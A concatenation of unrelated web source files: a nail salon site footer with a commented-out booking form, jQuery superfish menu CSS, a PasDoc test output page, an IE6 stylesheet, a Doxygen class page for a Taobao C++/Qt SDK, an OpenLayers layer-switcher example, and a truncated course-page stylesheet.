<!--<div class="container"> <div id="contact_form"> <div class="twelve columns offset-by-two formWrap"> <h2>Request a booking</h2> <form action="#" method="post" class="contactForm"> <div class="formSecWrap"> <input type="text" class="formField" title="Name" id="form_name" name="form_name" value="" /> <input type="text" class="formField" title="Email" name="form_email" id="form_email" value="" /> <input type="text" class="formField" title="Phone" name="form_phone" id="form_phone" value="" /> <input type="text" class="formField" title="Date &amp; Time" name="form_date" id="form_date" value="" /> </div> <div class="formSecWrap formSecWrap2"> <textarea class="textarea formField" title="Message" name="form_message" id="form_message"></textarea> </div> <input class="button" id="submit-form" type="submit" name="submit" value="Send Message" /> <div id="success"></div> <div id="test-message"></div> </form> </div> </div> </div>--> </div> <!--end contact--> <!--start parallax 6--> <div id="parallax-6" class="parallax fixed" style="background-image: url(images/parallax/parallax-6.jpg);"> <div class="quoteWrap"> <div class="quote"> <div class="container"> <div class="sixteen columns"> <h3> <span class="large">Visit our</span> <span class="largeBold">salon</span> <!--<br><span class="medium">in the heart of</span> <span class="mediumBold">Melbourne.</span> --> </h3> </div> </div> </div> </div> </div> <!--end parallax 6--> <!--start footer--> <div id="footer"> <div class="container"> <!-- Social --> <div class="sixteen columns"> <h3 class="sectionTitle">Follow, Like, Pin all the social stuff</h3> <ul class="socialLinks"> <li><a href="#" title="Twitter"><img src="images/icons/social-twitter.png" alt="" /></a></li> <li><a href="#" title="Facebook"><img src="images/icons/social-facebook.png" alt="" /></a></li> <li><a href="#" title="Google Plus"><img src="images/icons/social-google+.png" alt="" /></a></li> <li><a href="#" title="LinkedIn"><img src="images/icons/social-linkedin.png" alt="" /></a></li> <li><a href="#" title="Flickr"><img src="images/icons/social-flickr.png" alt="" /></a></li> <li><a href="#" title="Pinterest"><img src="images/icons/social-pinterest.png" alt="" /></a></li> </ul> </div> <!-- Social --> <div class="sixteen columns"> <p class="copyright">&copy; KEYA’S NAIL NIRVANA 2017. <br/>All rights reserved. </p> </div> </div> </div> <!--end footer--> <script type="text/javascript" src="js/prefixfree.min.js"></script> <script type="text/javascript" src="js/modernizr-2.6.2.js"></script> <script type="text/javascript" src="js/iOS-timer.js"></script> <script type="text/javascript" src="js/jquery.sticky.js"></script> <script type="text/javascript" src="js/jquery.hoverdir.js"></script> <script type="text/javascript" src="js/jquery.prettyPhoto.js"></script> <script type="text/javascript" src="js/jquery.easing.min.js"></script> <script type="text/javascript" src="js/jquery.mobile-touch-swipe-1.0.js"></script> <script type="text/javascript" src="js/jquery.parallax-1.1.3.js"></script> <script type="text/javascript" src="js/supersized.3.2.7.min.js"></script> <script type="text/javascript" src="js/supersized.shutter.min.js"></script> <script type="text/javascript" src="js/twitter.js"></script> <script type="text/javascript" src="js/custom.js"></script> <script type="text/javascript" src="js/contact_form.js"></script> <script type="text/javascript" src="http://www.parsecdn.com/js/parse-1.2.16.min.js"></script> <script type="text/javascript"> //<![CDATA[ function moveTo(contentArea){ var goPosition = $(contentArea).offset().top; $('html,body').animate({ scrollTop: goPosition}, 'slow'); } //]]> </script> <script type="text/javascript" charset="utf-8"> //<![CDATA[ $(document).ready(function(){ $("a[rel^='prettyPhoto']").prettyPhoto({animation_speed:'normal',slideshow:6000}); }); //]]> </script> </body> </html>
templates/agere/js/jsuperfish/superfish.css
vnishukov/agere
/*** ESSENTIAL STYLES ***/ .sf-menu, .sf-menu * { margin: 0; padding: 0; list-style: none; } .sf-menu { line-height: 1.0; } .sf-menu ul { position: absolute; top: -999em; width: 15em; /* left offset of submenus need to match (see below) */ } .sf-menu ul li { width: 100%; } .sf-menu li:hover { visibility: inherit; /* fixes IE7 'sticky bug' */ } .sf-menu li { float: left; position: relative; } .sf-menu a { display: block; position: relative; } .sf-menu li:hover ul, .sf-menu li.sfHover ul { left: 0; top: 2.5em; /* match top ul list item height */ z-index: 99; } ul.sf-menu li:hover li ul, ul.sf-menu li.sfHover li ul { top: -999em; } ul.sf-menu li li:hover ul, ul.sf-menu li li.sfHover ul { left: 15em; /* match ul width */ top: 0; } ul.sf-menu li li:hover li ul, ul.sf-menu li li.sfHover li ul { top: -999em; } ul.sf-menu li li li:hover ul, ul.sf-menu li li li.sfHover ul { left: 15em; /* match ul width */ top: 0; } /*** DEMO SKIN ***/ .sf-menu { float: left; margin-bottom: 1em; } .sf-menu a { border-left: 1px solid #fff; border-top: 1px solid #CFDEFF; padding: .75em 1em; text-decoration:none; } .sf-menu a, .sf-menu a:visited { /* visited pseudo selector so IE6 applies text colour*/ color: #13a; } .sf-menu li { background: #FF9900; } .sf-menu li li { background: #FFCD82; } .sf-menu li li li { background: #B8B8B8; } .sf-menu li:hover, .sf-menu li.sfHover, .sf-menu a:focus, .sf-menu a:hover, .sf-menu a:active { background: #FFCC00; outline: 0; } /*** arrows **/ .sf-menu a.sf-with-ul { padding-right: 2.25em; min-width: 1px; /* trigger IE7 hasLayout so spans position accurately */ } .sf-sub-indicator { position: absolute; display: block; right: .75em; top: 1.05em; /* IE6 only */ width: 10px; height: 10px; text-indent: -999em; overflow: hidden; background: url('images/arrows-ffffff.png') no-repeat -10px -100px; /* 8-bit indexed alpha png. IE6 gets solid image only */ } a > .sf-sub-indicator { /* give all except IE6 the correct values */ top: .8em; background-position: 0 -100px; /* use translucent arrow for modern browsers*/ } /* apply hovers to modern browsers */ a:focus > .sf-sub-indicator, a:hover > .sf-sub-indicator, a:active > .sf-sub-indicator, li:hover > a > .sf-sub-indicator, li.sfHover > a > .sf-sub-indicator { background-position: -10px -100px; /* arrow hovers for modern browsers*/ } /* point right for anchors in subs */ .sf-menu ul .sf-sub-indicator { background-position: -10px 0; } .sf-menu ul a > .sf-sub-indicator { background-position: 0 0; } /* apply hovers to modern browsers */ .sf-menu ul a:focus > .sf-sub-indicator, .sf-menu ul a:hover > .sf-sub-indicator, .sf-menu ul a:active > .sf-sub-indicator, .sf-menu ul li:hover > a > .sf-sub-indicator, .sf-menu ul li.sfHover > a > .sf-sub-indicator { background-position: -10px 0; /* arrow hovers for modern browsers*/ } /*** shadows for all but IE6 ***/ .sf-shadow ul { background: url('../images/shadow.png') no-repeat bottom right; padding: 0 8px 9px 0; -moz-border-radius-bottomleft: 17px; -moz-border-radius-topright: 17px; -webkit-border-top-right-radius: 17px; -webkit-border-bottom-left-radius: 17px; } .sf-shadow ul.sf-shadow-off { background: transparent; }
tests/testcases_output/htmlhelp/ok_cvar/ok_cvar.html
michaliskambi/pasdoc
<!DOCTYPE html> <html lang="en"> <head> <title>ok_cvar</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <link rel="StyleSheet" type="text/css" href="pasdoc.css"> </head> <body> <h1 class="unit">Unit ok_cvar</h1> <div class="sections"> <div class="one_section"><a class="section" href="#PasDoc-Description">Description</a></div><div class="one_section">Uses</div><div class="one_section">Classes, Interfaces, Objects and Records</div><div class="one_section">Functions and Procedures</div><div class="one_section">Types</div><div class="one_section">Constants</div><div class="one_section"><a class="section" href="#PasDoc-Variables">Variables</a></div></div> <span id="PasDoc-Description"></span><h2 class="description">Description</h2> &nbsp;<span id="PasDoc-Uses"></span><h2 class="overview">Overview</h2> <span id="PasDoc-Variables"></span><h3 class="summary">Variables</h3> <table class="summary wide_list"> <tr class="list"> <td class="itemcode"><code><b><a href="ok_cvar.html#DummyVar">DummyVar</a></b>: pointer; cvar; external 'dummy';</code></td> </tr> </table> <h2 class="description">Description</h2> <h3 class="detail">Variables</h3> <table class="detail wide_list"> <tr class="list"> <td class="itemcode"><span id="DummyVar"></span><code><b>DummyVar</b>: pointer; cvar; external 'dummy';</code></td> </tr> <tr><td colspan="1"> &nbsp;</td></tr> </table> </body></html>
ie6.css
maxya/cover-wp
@charset "utf-8"; /* CSS Document */ #feeds p { padding-top:0; } #searchform { margin-top:4px; } #headline, #latest, #the_loop, #comments_template { margin-right:0; } #featured { margin-left:5px; } #latest { margin-top:0; } #sidebar { margin-right:5px; margin-left:0; } #bottom .sitem { width:312px; } .sitem ul { margin-left:16px; } .sitem ul li { display:block; } .sitem ul li a { width:100%; } #footer { padding-top:7px; } #fbar { margin-left:0; } #copyright { padding-bottom:0; } #feedburner { margin-top:8px; } #feedburner #submit { width:65px; } ul#menu li li { margin-top:0; } ul#menu li li li { padding-left:0; } ul#menu li.sfhover ul ul, ul#menu li.sfhover ul ul ul { left: -999em; } ul#menu li.sfhover ul, ul#menu li li.sfhover ul, ul#menu li li li.sfhover ul { left: auto; } ul#menu li.sfhover { position: static; }
doc/classTimeGetResponse.html
sd44/TaobaoCppQtSDK
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.3.1"/> <title>Taobao Cpp/Qt SDK: TimeGetResponse Class Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="search/search.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="search/search.js"></script> <script type="text/javascript"> $(document).ready(function() { searchBox.OnSelectItem(0); }); </script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td style="padding-left: 0.5em;"> <div id="projectname">Taobao Cpp/Qt SDK </div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.3.1 --> <script type="text/javascript"> var searchBox = new SearchBox("searchBox", "search",false,'Search'); </script> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li><a href="pages.html"><span>Related&#160;Pages</span></a></li> <li class="current"><a href="annotated.html"><span>Classes</span></a></li> <li><a href="files.html"><span>Files</span></a></li> <li> <div id="MSearchBox" class="MSearchBoxInactive"> <span class="left"> <img id="MSearchSelect" src="search/mag_sel.png" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" alt=""/> <input type="text" id="MSearchField" value="Search" accesskey="S" onfocus="searchBox.OnSearchFieldFocus(true)" onblur="searchBox.OnSearchFieldFocus(false)" onkeyup="searchBox.OnSearchFieldChange(event)"/> </span><span class="right"> <a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a> </span> </div> </li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="annotated.html"><span>Class&#160;List</span></a></li> <li><a href="classes.html"><span>Class&#160;Index</span></a></li> <li><a href="inherits.html"><span>Class&#160;Hierarchy</span></a></li> <li><a href="functions.html"><span>Class&#160;Members</span></a></li> </ul> </div> <!-- window showing the filter options --> <div id="MSearchSelectWindow" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" onkeydown="return searchBox.OnSearchSelectKey(event)"> <a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark">&#160;</span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark">&#160;</span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark">&#160;</span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark">&#160;</span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark">&#160;</span>Variables</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark">&#160;</span>Pages</a></div> <!-- iframe showing the search results (closed by default) --> <div id="MSearchResultsWindow"> <iframe src="javascript:void(0)" frameborder="0" name="MSearchResults" id="MSearchResults"> </iframe> </div> </div><!-- top --> <div class="header"> <div class="summary"> <a href="#pub-methods">Public Member Functions</a> &#124; <a href="#pri-attribs">Private Attributes</a> &#124; <a href="classTimeGetResponse-members.html">List of all members</a> </div> <div class="headertitle"> <div class="title">TimeGetResponse Class Reference</div> </div> </div><!--header--> <div class="contents"> <p>TOP RESPONSE API: 获取淘宝系统当前时间 <a href="classTimeGetResponse.html#details">More...</a></p> <p><code>#include &lt;<a class="el" href="TimeGetResponse_8h_source.html">TimeGetResponse.h</a>&gt;</code></p> <table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pub-methods"></a> Public Member Functions</h2></td></tr> <tr class="memitem:adaf0868a9781081336ef3a2d93866a98"><td class="memItemLeft" align="right" valign="top">virtual&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTimeGetResponse.html#adaf0868a9781081336ef3a2d93866a98">~TimeGetResponse</a> ()</td></tr> <tr class="separator:adaf0868a9781081336ef3a2d93866a98"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a4575710f661782e2f2997b28c623a14a"><td class="memItemLeft" align="right" valign="top">QDateTime&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTimeGetResponse.html#a4575710f661782e2f2997b28c623a14a">getTime</a> () const </td></tr> <tr class="separator:a4575710f661782e2f2997b28c623a14a"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a41bee82aabfee62ae491a5ab7df7fee2"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTimeGetResponse.html#a41bee82aabfee62ae491a5ab7df7fee2">setTime</a> (QDateTime <a class="el" href="classTimeGetResponse.html#a0a03d1d4f2b7db39d0b8d62e7628b923">time</a>)</td></tr> <tr class="separator:a41bee82aabfee62ae491a5ab7df7fee2"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a30c54f865fafade3fb01b0c4b9d564fc"><td class="memItemLeft" align="right" valign="top">virtual void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTimeGetResponse.html#a30c54f865fafade3fb01b0c4b9d564fc">parseNormalResponse</a> ()</td></tr> <tr class="separator:a30c54f865fafade3fb01b0c4b9d564fc"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="inherit_header pub_methods_classTaoResponse"><td colspan="2" onclick="javascript:toggleInherit('pub_methods_classTaoResponse')"><img src="closed.png" alt="-"/>&#160;Public Member Functions inherited from <a class="el" href="classTaoResponse.html">TaoResponse</a></td></tr> <tr class="memitem:a2e4420f5671664de8a1360866977d28b inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a2e4420f5671664de8a1360866977d28b">TaoResponse</a> ()</td></tr> <tr class="separator:a2e4420f5671664de8a1360866977d28b inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a32ef9c53545a593316521cb1daab3e1a inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">virtual&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a32ef9c53545a593316521cb1daab3e1a">~TaoResponse</a> ()</td></tr> <tr class="separator:a32ef9c53545a593316521cb1daab3e1a inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:af5a077aab153edf6247200587ee855ee inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#af5a077aab153edf6247200587ee855ee">parseResponse</a> ()</td></tr> <tr class="separator:af5a077aab153edf6247200587ee855ee inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a174dc083a44795514cfe7a9f14a3731a inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a174dc083a44795514cfe7a9f14a3731a">setParser</a> (<a class="el" href="classParser.html">Parser</a> *parser)</td></tr> <tr class="separator:a174dc083a44795514cfe7a9f14a3731a inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a854c6fdaef0abbeab21b5a43f65233ea inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a854c6fdaef0abbeab21b5a43f65233ea">parseError</a> ()</td></tr> <tr class="separator:a854c6fdaef0abbeab21b5a43f65233ea inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:ae8f183ea55d76bf813f038aae7022db4 inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">QString&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#ae8f183ea55d76bf813f038aae7022db4">getErrorCode</a> () const </td></tr> <tr class="separator:ae8f183ea55d76bf813f038aae7022db4 inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a2468d6e3ad0939ba2f4b12efd1b00413 inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a2468d6e3ad0939ba2f4b12efd1b00413">setErrorCode</a> (const QString &amp;<a class="el" href="classTaoResponse.html#ac54f11b3b22a4f93c8587c1f4c3899d7">errorCode</a>)</td></tr> <tr class="separator:a2468d6e3ad0939ba2f4b12efd1b00413 inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:adf75dc6bcbb550c8edb64d33939345ed inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">QString&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#adf75dc6bcbb550c8edb64d33939345ed">getMsg</a> () const </td></tr> <tr class="separator:adf75dc6bcbb550c8edb64d33939345ed inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a76b9304897ecfc563d8f706d32c01b59 inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a76b9304897ecfc563d8f706d32c01b59">setMsg</a> (const QString &amp;<a class="el" href="classTaoResponse.html#adc5e9252ac61126ac2936ab2f6b9a0c6">msg</a>)</td></tr> <tr class="separator:a76b9304897ecfc563d8f706d32c01b59 inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a35fd73600c578a0d5fe9cbe1e1750689 inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">QString&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a35fd73600c578a0d5fe9cbe1e1750689">getSubCode</a> () const </td></tr> <tr class="separator:a35fd73600c578a0d5fe9cbe1e1750689 inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a3c6346680f5209b3b9cd7fa0277222e6 inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a3c6346680f5209b3b9cd7fa0277222e6">setSubCode</a> (const QString &amp;<a class="el" href="classTaoResponse.html#a5c6f8d740932e6453e7e3a2590fd3e6f">subCode</a>)</td></tr> <tr class="separator:a3c6346680f5209b3b9cd7fa0277222e6 inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a7a0c8be833060f35437f741af784dd69 inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">QString&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a7a0c8be833060f35437f741af784dd69">getSubMsg</a> () const </td></tr> <tr class="separator:a7a0c8be833060f35437f741af784dd69 inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a4eac44413ea5445d5cee1e8aac077194 inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a4eac44413ea5445d5cee1e8aac077194">setSubMsg</a> (const QString &amp;<a class="el" href="classTaoResponse.html#a13f08fbbfd176df1e06c9dbf579d06f4">subMsg</a>)</td></tr> <tr class="separator:a4eac44413ea5445d5cee1e8aac077194 inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:aff41254c8d0cf4454d663876569379d2 inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">bool&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#aff41254c8d0cf4454d663876569379d2">isSuccess</a> ()</td></tr> <tr class="separator:aff41254c8d0cf4454d663876569379d2 inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a92f81ae42b484c9b2258b508e4023068 inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">QString&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a92f81ae42b484c9b2258b508e4023068">getTopForbiddenFields</a> () const </td></tr> <tr class="separator:a92f81ae42b484c9b2258b508e4023068 inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2">&#160;</td></tr> <tr class="memitem:a475fb70a1c5657f8a947c3d1e3f5262d inherit pub_methods_classTaoResponse"><td class="memItemLeft" align="right" valign="top">void&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a475fb70a1c5657f8a947c3d1e3f5262d">setTopForbiddenFields</a> (const QString &amp;<a class="el" href="classTaoResponse.html#a4ff01826fe5b531e2427c7df23d4cc18">topForbiddenFields</a>)</td></tr> <tr class="separator:a475fb70a1c5657f8a947c3d1e3f5262d inherit pub_methods_classTaoResponse"><td class="memSeparator" colspan="2">&#160;</td></tr> </table><table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="pri-attribs"></a> Private Attributes</h2></td></tr> <tr class="memitem:a0a03d1d4f2b7db39d0b8d62e7628b923"><td class="memItemLeft" align="right" valign="top">QDateTime&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTimeGetResponse.html#a0a03d1d4f2b7db39d0b8d62e7628b923">time</a></td></tr> <tr class="memdesc:a0a03d1d4f2b7db39d0b8d62e7628b923"><td class="mdescLeft">&#160;</td><td class="mdescRight">淘宝系统当前时间。格式:yyyy-MM-dd HH:mm:ss <a href="#a0a03d1d4f2b7db39d0b8d62e7628b923">More...</a><br/></td></tr> <tr class="separator:a0a03d1d4f2b7db39d0b8d62e7628b923"><td class="memSeparator" colspan="2">&#160;</td></tr> </table><table class="memberdecls"> <tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="inherited"></a> Additional Inherited Members</h2></td></tr> <tr class="inherit_header pub_attribs_classTaoResponse"><td colspan="2" onclick="javascript:toggleInherit('pub_attribs_classTaoResponse')"><img src="closed.png" alt="-"/>&#160;Public Attributes inherited from <a class="el" href="classTaoResponse.html">TaoResponse</a></td></tr> <tr class="memitem:a49272f40b67d4bbb9c63f3f7b1ae7386 inherit pub_attribs_classTaoResponse"><td class="memItemLeft" align="right" valign="top"><a class="el" href="classParser.html">Parser</a> *&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="classTaoResponse.html#a49272f40b67d4bbb9c63f3f7b1ae7386">responseParser</a></td></tr> <tr class="separator:a49272f40b67d4bbb9c63f3f7b1ae7386 inherit pub_attribs_classTaoResponse"><td class="memSeparator" colspan="2">&#160;</td></tr> </table> <a name="details" id="details"></a><h2 class="groupheader">Detailed Description</h2> <div class="textblock"><p>TOP RESPONSE API: 获取淘宝系统当前时间 </p> <dl class="section author"><dt>Author</dt><dd>sd44 <a href="#" onclick="location.href='mai'+'lto:'+'sd4'+'4s'+'dd4'+'4@'+'yea'+'h.'+'net'; return false;">sd44s<span style="display: none;">.nosp@m.</span>dd44<span style="display: none;">.nosp@m.</span>@yeah<span style="display: none;">.nosp@m.</span>.net</a> </dd></dl> </div><h2 class="groupheader">Constructor &amp; Destructor Documentation</h2> <a class="anchor" id="adaf0868a9781081336ef3a2d93866a98"></a> <div class="memitem"> <div class="memproto"> <table class="mlabels"> <tr> <td class="mlabels-left"> <table class="memname"> <tr> <td class="memname">virtual TimeGetResponse::~TimeGetResponse </td> <td>(</td> <td class="paramname"></td><td>)</td> <td></td> </tr> </table> </td> <td class="mlabels-right"> <span class="mlabels"><span class="mlabel">inline</span><span class="mlabel">virtual</span></span> </td> </tr> </table> </div><div class="memdoc"> </div> </div> <h2 class="groupheader">Member Function Documentation</h2> <a class="anchor" id="a4575710f661782e2f2997b28c623a14a"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">QDateTime TimeGetResponse::getTime </td> <td>(</td> <td class="paramname"></td><td>)</td> <td> const</td> </tr> </table> </div><div class="memdoc"> </div> </div> <a class="anchor" id="a30c54f865fafade3fb01b0c4b9d564fc"></a> <div class="memitem"> <div class="memproto"> <table class="mlabels"> <tr> <td class="mlabels-left"> <table class="memname"> <tr> <td class="memname">void TimeGetResponse::parseNormalResponse </td> <td>(</td> <td class="paramname"></td><td>)</td> <td></td> </tr> </table> </td> <td class="mlabels-right"> <span class="mlabels"><span class="mlabel">virtual</span></span> </td> </tr> </table> </div><div class="memdoc"> <p>Implements <a class="el" href="classTaoResponse.html#a726f09ea73fc5f7e1560c097d03b9838">TaoResponse</a>.</p> </div> </div> <a class="anchor" id="a41bee82aabfee62ae491a5ab7df7fee2"></a> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">void TimeGetResponse::setTime </td> <td>(</td> <td class="paramtype">QDateTime&#160;</td> <td class="paramname"><em>time</em></td><td>)</td> <td></td> </tr> </table> </div><div class="memdoc"> </div> </div> <h2 class="groupheader">Member Data Documentation</h2> <a class="anchor" id="a0a03d1d4f2b7db39d0b8d62e7628b923"></a> <div class="memitem"> <div class="memproto"> <table class="mlabels"> <tr> <td class="mlabels-left"> <table class="memname"> <tr> <td class="memname">QDateTime TimeGetResponse::time</td> </tr> </table> </td> <td class="mlabels-right"> <span class="mlabels"><span class="mlabel">private</span></span> </td> </tr> </table> </div><div class="memdoc"> <p>淘宝系统当前时间。格式:yyyy-MM-dd HH:mm:ss </p> </div> </div> <hr/>The documentation for this class was generated from the following files:<ul> <li>TaoApiCpp/response/<a class="el" href="TimeGetResponse_8h_source.html">TimeGetResponse.h</a></li> <li>TaoApiCpp/response/<a class="el" href="TimeGetResponse_8cpp.html">TimeGetResponse.cpp</a></li> </ul> </div><!-- contents --> <!-- start footer part --> <hr class="footer"/><address class="footer"><small> Generated on Sun Apr 14 2013 16:25:41 for Taobao Cpp/Qt SDK by &#160;<a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/> </a> 1.8.3.1 </small></address> </body> </html>
scripts/ol3-layerswitcher-master/examples/layerswitcher.html
apgeo/silexgis
<!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <title>OpenLayers 3 - LayerSwitcher</title> <meta name="viewport" content="initial-scale=1.0, user-scalable=no, width=device-width"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/ol3/3.14.0/ol.css" /> <link rel="stylesheet" href="../src/ol3-layerswitcher.css" /> <link rel="stylesheet" href="layerswitcher.css" /> </head> <body> <div id="map"></div> <script src="https://cdnjs.cloudflare.com/ajax/libs/ol3/3.14.0/ol.js"></script> <script src="../src/ol3-layerswitcher.js"></script> <script src="layerswitcher.js"></script> </body> </html>
WebRoot/frontstage/css/public/courseInfo.css
hemoye/doIT
body { background-color: #edeff0; } #head { background: #fff; } #main .course-heading{ font-family: "microsoft yahei"; margin-top: 20px; } .course-heading .breadcrumb { background-color: #edeff0; font-size: 16px; } .course-heading .breadcrumb li a { color:#999; text-decoration: none; } .course-heading .breadcrumb li a:hover { color: #00AAEE; } .course-heading .breadcrumb li.active { color: #444; } .course-info { position: relative; font-family: "microsoft yahei"; } .course-info div { padding-left: 0; padding-right: 0; } .course-info-img img{ float: right; width: 100%; height: 331px; } .course-info-state ul { background: #364247; padding: 0 40px; overflow: hidden; } @media only screen and (max-width: 992px) { .course-info-state .list-group { margin-bottom: 0; } } .course-info-state li { padding: 0; border:0; height: 111px; overflow: hidden; line-height: 111px; background: #364247; } .course-info-state li + li { border-top: 1px solid #414f55; } .course-info-state li span { color: #dedede; font-size: 14px; line-height: 24px; margin-right: 15px; } .course-info-state li em { font-size: 24px; color: #ffffff; } .course-info-state li em.ft-adjust { font-size: 14px; } .course-info-state li em.ft-adjust span { font-size: 24px; color: indianred; margin-right: 0; } .course-info-intro { background: skyblue; padding: 44px 0; cursor: pointer; } .concerned_course a { text-decoration: none; } .concerned_course .btn-add-follow { display: block; text-align: center; } .course-info-intro:hover em{ color: #fff; } .btn-add-follow em { display: block; color: teal; line-height: 1em; transition: color 0.2s ease-out; -webkit-transition: color 0.2s ease-out; -moz-transition: color 0.2s ease-out; -o-transition: color 0.2s ease-out; font-style: normal; } .btn-add-follow span { } .course-info-intro:hover .btn-add-follow span { color: rgba(255,0,0,0.5); animation:myheart 2s infinite ease-in; -moz-animation:myheart 2s infinite ease-in; -webkit-animation:myheart 2s infinite ease-in-out; -o-animation:myheart 